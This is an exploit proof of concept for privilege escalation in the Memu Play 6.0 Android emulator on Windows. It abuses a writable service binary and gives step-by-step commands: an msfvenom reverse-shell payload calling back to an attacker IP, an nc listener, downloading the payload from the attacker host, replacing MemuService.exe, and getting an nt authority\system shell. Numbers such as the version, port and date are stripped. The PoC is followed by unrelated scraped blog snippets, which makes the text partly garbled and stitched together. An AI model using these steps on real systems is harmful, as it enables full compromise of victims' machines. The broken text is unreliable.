# Exploit Title: Memu Play 6.0. - Privilege Escalation (PoC)

# Date: //

# Author: Alejandra Sánchez

# Vendor Homepage: https://www.memuplay.com/

# Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release

# Version: 6.0.

# Tested on: Windows  / Windows 

# Description:

#  Memu Play 6.0. suffers from Privilege Escalation due to insecure file permissions

# Prerequisites

# Local, Low privilege access with restart capabilities

# Details

# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.

# A low privilege account is able to rename the MemuService.exe file located in this same path and replace

# with a malicious file that would connect back to an attacking computer giving system level privileges

# (nt authority\system) due to the service running as Local System.

# While a low privilege user is unable to restart the service through the application, a restart of the

# computer triggers the execution of the malicious file.

C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"

C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)

                                                      BUILTIN\Administrators:(I)(F)

                                                      BUILTIN\Users:(I)(F)

                                                      NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed  files; Failed processing  files

C:\>sc qc MEmuSVC

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MEmuSVC

        TYPE               :   WIN32_OWN_PROCESS

        START_TYPE         :    AUTO_START

        ERROR_CONTROL      :    NORMAL

        BINARY_PATH_NAME   : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe

        LOAD_ORDER_GROUP   :

        TAG                : 

# Proof of Concept

. Generate malicious .exe on attacking machine

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT= -f exe > /var/www/html/MemuService.exe

. Setup listener and ensure apache is running on attacking machine

    nc -lvp

    service apache2 start

. Download malicious .exe on victim machine

    Open browser to http://192.168.1.130/MemuService.exe and download

. Overwrite file and copy malicious .exe.

    Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak

    Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\

. Restart victim machine

. Reverse Shell on attacking machine opens

    C:\Windows\system32>whoami

    whoami

    nt authority\system

[EXP]Memu Play 6.0.7 - Privilege Escalation的更多相关文章

  1. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  2. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  3. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  4. FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...

  5. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  6. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  7. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. [EXP]Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation

    Windows: XmlDocument Insecure Sharing Elevation of Privilege Platform: Windows (almost certainly ear ...

随机推荐

  1. Cdnbest的cdn程序默认支持web Socket

    Cdnbest的cdn程序默认支持web Socket    WSS 是 Web Socket Secure 的简称, 它是 WebSocket 的加密版本. 我们知道 WebSocket 中的数据是 ...

  2. 在ASP.NET MVC中使用UEditor无法提交的解决办法

    很简单的一个ajax提交,却怎么都不成功 $.ajax({ type: "POST", url: "/mms/riskmanage/commitreply", ...

  3. CentOS 特殊变量($0、$1、$2、 $?、 $# 、$@、 $*)

    名称 说明 $0 脚本名称 $1-9 脚本执行时的参数1到参数9 $? 脚本的返回值 $# 脚本执行时,输入的参数的个数 $@ 输入的参数的具体内容(将输入的参数作为一个多个对象,即是所有参数的一个列 ...

  4. 移动端(处理边距样式)reset.css

    移动端reset.css,来自张鑫旭网站的推荐,下载地址:https://huruqing.gitee.io/demos/source/reset.css 代码 /* html5doctor.com ...

  5. 关于php条形码生成(barcode),修改样式

    今天听错了需求,以为要重新设计条形码,第一次制作这个,经过搜索使用的barcode这个第三方的,具体使用步骤网上很多就不在这里详细介绍了.主要是今天遇到的样式修改问题: barcode经过查看是无法自 ...

  6. js string to date

    Date.prototype.pattern=function(fmt) { //alert(this.getFullYear()); fmt=fmt.toUpperCase(); var o = { ...

  7. for循环,列表,元组

    依旧是python基础 for循环 s = 'woeudbwieb' for i in s:#s代表可迭代对象 print(i) if 'c' not in s: print('没有c') 列表 每个 ...

  8. MongoDB、Hbase、Redis等NoSQL分析

    NoSQL的四大种类 NoSQL数据库在整个数据库领域的江湖地位已经不言而喻.在大数据时代,虽然RDBMS很优秀,但是面对快速增长的数据规模和日渐复杂的数据模型,RDBMS渐渐力不从心,无法应对很多数 ...

  9. boost asio 学习(六) 定时器

    http://www.gamedev.net/blog/950/entry-2249317-a-guide-to-getting- started-with-boostasio?pg=7 6 定时器 ...

  10. merge and saveorupdate

    首先 saveOrUpdate返回void 也就是什么都不返回 而merge会返回一个对象 merge 在执行session.merge(a)代码后,a对象仍然不是持久化状态,a对象仍然不会被关联到S ...